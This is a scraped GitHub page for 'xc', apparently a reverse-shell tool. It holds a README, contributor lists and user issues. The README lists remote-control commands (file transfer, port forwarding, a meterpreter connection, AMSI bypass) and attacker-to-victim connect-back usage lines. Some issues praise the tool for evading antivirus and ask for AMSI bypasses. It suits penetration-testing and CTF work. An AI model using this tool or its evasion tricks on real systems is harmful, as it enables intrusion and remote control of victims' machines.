xct / xc Goto Github PK

View Code? Open in Web Editor NEW

559.0 8.0 110.0 822 KB

A small reverse shell for Linux & Windows

Go 88.57% Python 11.43%

xc's Introduction

XC

Netcat like reverse shell for Linux & Windows.

Features

Windows

Usage:
└ Shared Commands:  !exit
  !upload <src> <dst>
   * uploads a file to the target
  !download <src> <dst>
   * downloads a file from the target
  !lfwd <localport> <remoteaddr> <remoteport>
   * local portforwarding (like ssh -L)
  !rfwd <remoteport> <localaddr> <localport>
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd <index>
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin <plugin>
   * execute a plugin
  !spawn <port>
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas <username> <password> <domain>
   * restart xc with the specified user
  !met <port>
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
  !powershell
    * starts powershell with AMSI Bypass
  !rc <port>
    * connects to a local bind shell and restarts this client over it
  !runasps <username> <password> <domain>
    * restart xc with the specified user using powershell
  !vulns
    * checks for common vulnerabilities

Linux

Usage:
└ Shared Commands:  !exit
  !upload <src> <dst>
   * uploads a file to the target
  !download <src> <dst>
   * downloads a file from the target
  !lfwd <localport> <remoteaddr> <remoteport>
   * local portforwarding (like ssh -L)
  !rfwd <remoteport> <localaddr> <localport>
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd <index>
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin <plugin>
   * execute a plugin
  !spawn <port>
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas <username> <password> <domain>
   * restart xc with the specified user
  !met <port>
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
 !ssh <port>
   * starts sshd with the configured keys on the specified port

Examples

Linux Attacker: rlwrap xc -l -p 1337 (Server)
WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
GO111MODULE=off go get github.com/libp2p/go-reuseport
sudo apt-get install rlwrap upx

Linux:

python3 build.py

Credits

Included for Windows Clients: https://github.com/itm4n/PrivescCheck
Included for Windows Clients: https://github.com/PowerShell/Win32-OpenSSH

xc's People

Contributors

Stargazers

Watchers

Forkers

zhouzu askyeye otsector amasser repo4chu papadope-zz spengesec triplekill davidilles joohoi crackercat levitatingbusinessman lybobob1 an4ke 0dayctf kimusan tomikoski aishee oh6hay fdlucifer vsamiamv t3kx hick nosorry clayne 3rkut 5l1v3r1 kknas x2020 dannymas 740i ocean-redemption f1r4s tmp63498 vineetkia x0rin sinsixx psechopath munjurhasan444 jjsdub556 hackdou exi1sh0w epichoxha mibaltoalex y0d4a johnjohnsp1 optionalg superuser5 babywyrm eniac888 fevergeek nullcult ahkecha kfdcompiled sh3bu darkoneiroi korallin st0pli shizonic atlassion yeti-code an0nym0u5101 bb33bb f11snipe zpaav zer0dac m4niac-0x sec-fork phuong39 sneakyturtle158 siddicky bypazs miseryyyyy shantanu561993 naturalstate jesusgavancho gmmos cihan-ozcan emreblky mgstate ahmedsakrr iq-scm affilares lishasha9 maliciouscereal 6b3478 hellsc4 rootkit7 audibleblink mranv ronin-dojo gmh5225 mukarramkhalid kawa5604 brosjsy jayaram-yalla mdiqbalahmad iccugs

xc's Issues

issues with keywords '!download' and '!lfwd'...

Hello,

File: server/server.go Line: 147 , func handleCmd
case utils.Bake("/jyVgMchLLo="):
is equivalent to:
case "download"
the code under the 'case' never runs.
The correct code is:
case "!download":
( in offuscated code, it will be :
case utils.Bake("uzeNmcUiIr9d"):

Same typo with
File: server/server.go Line: 152 , func handleCmd
case utils.Bake("9jWVig=="):
is equivalent to:
case "lfwd"
The correct code is:
case "!lfwd":
( in offuscated code, it will be :
case utils.Bake("uz+Emc8="):

My env: Debian 11, golang 1.17.4, xc server & xc client on the same host.
Thanks for your work. It shows how to use the hashicorp/yamux library efficiently.
Regards

PS: my small and dirty tool joined to this issue

xc_toolbis.go.txt

[Linux] - cannot spawn another client

On the box you created, named Agile, I tried to spawn another client but it failed complaining about permissions as follow:

[xc: /home/corum]: !spawn 1234
[xc: /home/corum]: /bin/sh: 1: /dev/shm/otZIatiz: Permission denied

[xc: /home/corum]: !spawn 4545
[xc: /home/corum]: /bin/sh: 1: /dev/shm/QpfqVeYj: Permission denied

[xc: /home/corum]: ls -la /dev/shm
total 10864
drwxrwxrwt  2 root  root      120 Jul 24 13:12 .
drwxr-xr-x 17 root  root     3920 Jul 24 12:36 ..
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 QpfqVeYj
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 RDrueXsW
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 iHkXeDxO
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 otZIatiz

Love your work and the videos !
Cheers

Failed to build project.

Not sure how to build this project. Tried using make. see below. Go is of course installed and I have all the dependencies.

kali@kali:/xc$ ls
client files gen.py load.go Makefile meter plugins README.md scripts server shell utils vulns xc.go
kali@kali:/xc$ sudo make
rm files/keys/host*
rm files/keys/key*
mkdir -p files/keys
yes 'y' | ssh-keygen -t ed25519 -f files/keys/key -q -N ""
yes 'y' | ssh-keygen -f host_dsa -N '' -t dsa -f files/keys/host_dsa -q -N ""
yes 'y' | ssh-keygen -f host_rsa -N '' -t rsa -f files/keys/host_rsa -q -N ""
rm -f xc xc.exe shell/keys.go meter/sc.go
go generate
make: go: No such file or directory
make: *** [Makefile:14: generate] Error 127

Support `tea` magic?

I came across your fantastic library because it was recently added to tea. That got me thinking, it would be great if xc were aware of tea somehow and could grab a binary on the fly.

Passing through signals to subprograms

Currently signals are just ignored completely. Since there's some programs (pspy64s) that cannot be exited without ctrl+c or other signals, it might be a good idea to instead pass them through to any subprograms.

Port forwards issues after session reconnection

Hello!

The forwards configured in a disconnected session are still visible in the automatically reestablished session (using !lsfwd) but aren't functional (no port actually opened on the host).

An index out of range error also arise while attempting to remove forwards that were configured through a disconnected then automatically reestablished session:

The xc binaries were build from sources (build: JLBKqkmIkIWRmmJF).

(There is also no out of bound check in the !rmfwd and the same error arise if an out of range index is specified in a normal setting.)

!VULN needs AMSI bypass before running

Ive been testing this out - love it! this is more of a feature request, but the !vuln plugin script gets picked up by AMSI - was wondering if you could implement to run an AMSI bypass first, then run this script?

Perhaps its already doing this, but getting picked up because its dropped to the file system?

Problem with paths containing blank spaces

Hi,

I'm getting some troubles moving into paths containing spaces. I'm not sure where the problem is arised but there is a difference between the physical cmd, and the remote using xc. As example, I cannot access to paths containing blank spaces. I've tried some different approaches and directories but in the end, the result is always de same. I attach an evidence of this.

Thanks for your tool, still not detected by some AVs which is great,
Regards.